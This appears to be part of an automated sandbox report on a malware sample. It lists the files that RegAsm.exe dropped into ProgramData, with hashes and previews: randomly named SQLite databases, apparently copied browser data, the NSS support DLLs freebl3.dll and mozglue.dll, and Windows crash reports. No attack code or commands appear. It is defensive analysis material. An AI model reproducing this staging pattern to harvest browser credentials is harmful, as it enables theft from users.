                                                                                                                                                                                                                                                  C:\ProgramData\CAAKKFHCFIECAAAKEGCF

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\ECFHIJKJ

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\EGIDAAFI

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\GCBGCAFI

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\GHDHDBAECGCAFHJJDAKF

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\HDAKJDHIEBFIIDGDGDBAEGCGDA

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\IIJDBGDGCGDAKFIDGIDBFIEHDH

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                                                                                                                  Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                                  MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                                  SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                                  SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                                  SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_c5ac9ded19774e294e4b23df51992ee9addb81_c9e05f82_07d774b4-4f7f-424b-b977-909ace4dfb05\Report.wer

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                                                  Entropy (8bit):0.9088142992364229
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:N0+dcBoTzvyP4Gic0BU/fIxaGszuiFUZ24IO8EB:W9qyniXBU/iadzuiFUY4IO8I
                                                                                                                                                                                                                                                  MD5:0F5BEEB1C5B0E46E11810B12F6A3FD40
                                                                                                                                                                                                                                                  SHA1:E4E01160528A8D544B0371C07C21C0D133AE04BA
                                                                                                                                                                                                                                                  SHA-256:1ED7B1E36C702E71E7C386CE8C82E4E265329C72F14E54CE4EC90544ADC7F2A3
                                                                                                                                                                                                                                                  SHA-512:60C6D7B58D5B3476E3AD29253698AC5014C23A08FA8BB90D29AB91842EAD6D0B1CEC0D98289AFED2930035407E0BF48F66D2E2128DD66F7E8297B0994578C368
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.6.1.8.4.0.7.0.5.3.3.1.3.3.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.6.1.8.4.0.7.1.1.5.8.1.3.1.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.7.d.7.7.4.b.4.-.4.f.7.f.-.4.2.4.b.-.b.9.7.7.-.9.0.9.a.c.e.4.d.f.b.0.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.7.7.4.7.0.3.b.-.8.d.0.5.-.4.6.c.c.-.9.1.6.2.-.0.4.2.b.7.e.9.8.9.4.6.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.F.r.i.e.n.d.l.y...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.3.0.-.0.0.0.1.-.0.0.1.4.-.2.5.b.2.-.5.c.5.6.c.9.8.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.6.a.2.e.d.b.6.b.b.5.1.0.7.3.7.a.9.b.2.c.c.e.f.6.c.d.6.d.4.4.2.0.0.0.0.0.0.0.0.!.0.0.0.0.7.1.8.8.2.b.b.0.2.d.1.f.a.7.b.4.a.0.f.8.2.4.a.f.d.c.c.1.c.d.5.3.b.d.b.8.5.b.a.1.!.

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERD260.tmp.dmp

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 15 streams, Fri Mar 29 11:07:50 2024, 0x1205a4 type
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):174462
                                                                                                                                                                                                                                                  Entropy (8bit):3.9272227368226966
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:sa/IuBojRypN4uE2aOHJOl9RLTgnSVXlGAjTgYd0CDUtTb0HTCP:sa0U4uEqHJGLTgnytTvub
                                                                                                                                                                                                                                                  MD5:3EA1B5B50FA4D8D06095DB0E7401D811
                                                                                                                                                                                                                                                  SHA1:8BD82C92DFCAC5D04825D14631EDC8BAF2C5732E
                                                                                                                                                                                                                                                  SHA-256:F4438F9A3BE0E1D0F0C267F0AC8175092A1D704F9319D1A0EF38E0BF09DCE87B
                                                                                                                                                                                                                                                  SHA-512:3FE4E45DF3E9174E568B4F633AA3477E0AA5412D11FED934AAB05BE6B32F8B44E8A7987D6827BC519E917438CCD5B49DCE9CABD9EBB892A49C7D2161B4DD949E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:MDMP..a..... ..........f....................................$...........4...$9..........`.......8...........T............$.........................................................................................................eJ......L.......GenuineIntel............T.......0......f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERD3B9.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):8310
                                                                                                                                                                                                                                                  Entropy (8bit):3.700225780508715
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJ6CjS6I6Y9ASUAOSeOgmfBW4JWprB89bnsssfS9Km:R6lXJdS6I6YKSUPSeOgmfc4JNns/fc7
                                                                                                                                                                                                                                                  MD5:EC6BE54A124EAC8A08055E6B28C4A3A6
                                                                                                                                                                                                                                                  SHA1:4473AA342B7CA1AC63A0D020F4F7C46A751061E3
                                                                                                                                                                                                                                                  SHA-256:131D5D069B0215024A0952AA47841DC47335AA1DE71DFA761BC14E72874D6049
                                                                                                                                                                                                                                                  SHA-512:4C6F6367732B5E2E8CE06EB8FD94EF9D3B58DFF92073E9B3BF2295D39B89FCE7E87402BD6D54E661669360CCA665371C55100E0E3C0570D560D5DEC4A8A803CB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.7.2.<./.P.i.

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERD3D9.tmp.xml

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4628
                                                                                                                                                                                                                                                  Entropy (8bit):4.455426325382966
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zsEJg77aI9XIVWpW8VY6Ym8M4JoAFg+q8o3HAX/Y3/Gd:uIjfCI7VV7VeJU1HAX/Y3ud
                                                                                                                                                                                                                                                  MD5:30B77BC9DEA1972DA118C47A1FAB24AD
                                                                                                                                                                                                                                                  SHA1:5E26B2249339EEF0DFEE21C02FA0C2AB58A1D285
                                                                                                                                                                                                                                                  SHA-256:AC97B7F338D322BEB3D0E631B58EAF5C9DFD2FB8E74325F72B5D81F95DC956A4
                                                                                                                                                                                                                                                  SHA-512:4B856C7972752419CDBB816E5B93E2BD007753109157EED8D57E3AD64D46E482D64630BDDF255D0D816C910E179297A287FC830DADD3C19FC62ADB26E116FC5B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="256450" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                  C:\ProgramData\freebl3.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):685392
                                                                                                                                                                                                                                                  Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                  MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                  SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                  SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                  SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                  • Filename: OJP7vrLRNG.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: GqMyzGzrFq.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: z5uPcOrP22.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: BuThoFHNNK.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: 6uVlPQSJ4e.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: i1crvbOZAP.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: yU3icg18lq.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: EcNghZJd5O.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):608080
                                                                                                                                                                                                                                                  Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                  MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                  SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                  SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                  SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                  • Filename: OJP7vrLRNG.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: GqMyzGzrFq.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: z5uPcOrP22.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: BuThoFHNNK.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: 6uVlPQSJ4e.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: i1crvbOZAP.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: yU3icg18lq.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: EcNghZJd5O.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\msvcp140.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):450024
                                                                                                                                                                                                                                                  Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                  MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                  SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                  SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                  SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
